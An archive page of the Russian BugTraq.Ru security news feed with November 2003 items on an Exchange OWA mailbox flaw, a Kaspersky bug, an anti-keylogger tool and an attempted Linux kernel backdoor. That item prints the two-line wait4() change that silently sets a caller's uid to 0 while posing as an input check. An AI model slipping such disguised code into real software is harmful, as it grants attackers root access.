информационная безопасность
без паники и всерьез
 подробно о проекте
Rambler's Top100Где водятся OGRыВсе любят мед
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 ФБР нашла русский след в атаках... 
 Массовый взлом SharePoint 
 Microsoft Authenticator прекращает... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / RSN
RSN
RSN
архив
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
2015
2014
2013
2012
2011
2010
2009
2008
2007
2006
2005
2004
2003
2002
2001
экспорт
конкурс




Подписка:
BuqTraq: Обзор
RSN
РВС
БСК




MS изучает возможную уязвимость Exchange 2003
dl // 25.11.03 03:20
Потенциальная уязвимость находится в компоненте Outlook Web Access (OWA).
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/35.html]
Сообщается, что залогинившись с его помощью, пользователи случайным образом могут попасть в чужие почтовые ящики, причем с полными правами доступа. Предварительное расследование показало, что это вроде бы происходит при запрещенной Kerberos-аутентификации, но обнаруживший данную ошибку администратор настаивает на том, что ничего не запрещал и вообще использовал дефолтовую конфигурацию.

Расследование продолжается, патч тестируется.

Источник: Computerworld
теги: outlook  |  обсудить  |  все отзывы (1)


Еще один неудавшийся бэкдор в ядре Linux
Ktirf // 23.11.03 23:35
Преамбула: для поддержки разработки ядра Linux используется не CVS, а BitKeeper.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/34.html]
Соответственно, львиная доля публикуемых ядер (и все ядра, публикуемые на kernel.org) берутся из BitKeeper. Для тех, кто по разным причинам не хочет или не может пользоваться BitKeeper, группа добровольцев поддерживает CVS-зеркало. Изменения в ядре никогда не вносятся напрямую в CVS, только через BitKeeper.
Собственно новость состоит в том, что 6 ноября уже во второй раз (первый был обнаружен 5 ноября, и о нем уже сообщалось) была предпринята попытка внести "небольшое изменение" в CVS-зеркало ядра. Изменение состояло в добавлении двух строк в системный вызов wait4():

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
  retval = -EINVAL;

Выглядит как проверка входных параметров, но если посмотреть на выражение current->uid = 0, то становится ясно, что локальный процесс, вызывающий wait4() с указанным значением options, получает права суперпользователя - классический бэкдор.
К счастью, в силу сказанного в преамбуле, ни в одно из публикуемых ядер это изменение попасть шансов не имело. BitKeeper же является довольно параноидальной системой - в частности, любое вносимое изменение ядра должно получить подтверждение Линуса или его ближайших помощников. Правда, на данный момент в BitKeeper не встроен механизм ЭЦП, поэтому теоретическая возможность протащить патч, выдав себя за источник, которому Линус или любой утверждающий доверяют, пока остается.

Источник: LWN
теги: linux  |  обсудить  |  все отзывы (1)


И еще раз о плагиате
dl // 23.11.03 21:03
В "Библиотеке" опубликован разбор книги "Защита информации с использованием смарт-карт и электронных брелоков", проведенный Алексеем Лукацким.

Источник: Как педагоги из Таганрога присваивают авторство...
обсудить  |  все отзывы (0)


Долой кейлоггеры
dl // 23.11.03 04:51
Центр информационной безопасности сообщает о выпуске PrivacyKeyboard 2.0, основное назначение которой - противодействие всевзможному "шпионскому" софту, кейлоггерам и т.п.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/32.html]
Программа использует эвристические алгоритмы, учитывающие основные принципы, присущие всем мониторинговым программам, и включает в себя модули защиты от перехвата клавиатуры, от захвата текста/графики из окон, от аппаратных и программных кейлоггеров.

Источник: описание программы
обсудить  |  все отзывы (6)


Ошибка в Kaspersky AntiVirus 4.5.0.48
dl // 22.11.03 12:14
Дмитрий Вольгушин aka J'JF сообщает об ошибке в KAV, проявляющейся при проверке файла, зараженного Macro.Acad.Star - файл не лечится и не удаляется, а движок KAV выдает сообщение об ошибке ядра.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/31.html]
Производитель подтвердил наличие ошибки, но пока непонятно, связана ли она именно с Macro.Acad.Star, или с самим зараженным файлом. Идет работа над решением проблемы.

Дополнение: согласно более позднему сообщению, причина ошибки в том, что лечение, реализованное для зараженных dwg-файлов, применялось и к файлам с исходниками. Обещано исправление в ближайшем кумулятивном обновлении.

Источник: сообщение на форуме
обсудить  |  все отзывы (0)




««    «   381  |  382  |  383  |  384  |  385  |  386  |  387  |  388  |  389  |  390 >>  »    »»


Предложить свою новость

анонимность клоуны конференции спам уязвимости .net acrobat activex adobe android apple backdoor beta bgp bitcoin blaster borland botnet chrome cisco crypto ctf ddos dmca dnet dns dos dropbox eclipse ecurrency eeye elcomsoft excel facebook firefox flash freebsd fsf github gnome google gpl hp https ibm icq ie intel ios iphone java javascript l0pht leak linux livejournal mac mcafee meltdown microsoft mozilla mysql netware nginx novell ny open source opera oracle os/2 outlook password patch php powerpoint programming pwn2own quicktime rc5 redhat retro rip router rsa safari sco secunia server service pack shopping skype smb solaris sony spyware sql injection ssh ssl stuff sun symantec torrents unix virus vista vmware vpn wikipedia windows word xp xss yahoo yandex youtube


Rambler's Top100
Рейтинг@Mail.ru



  Copyright © 2001-2025 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach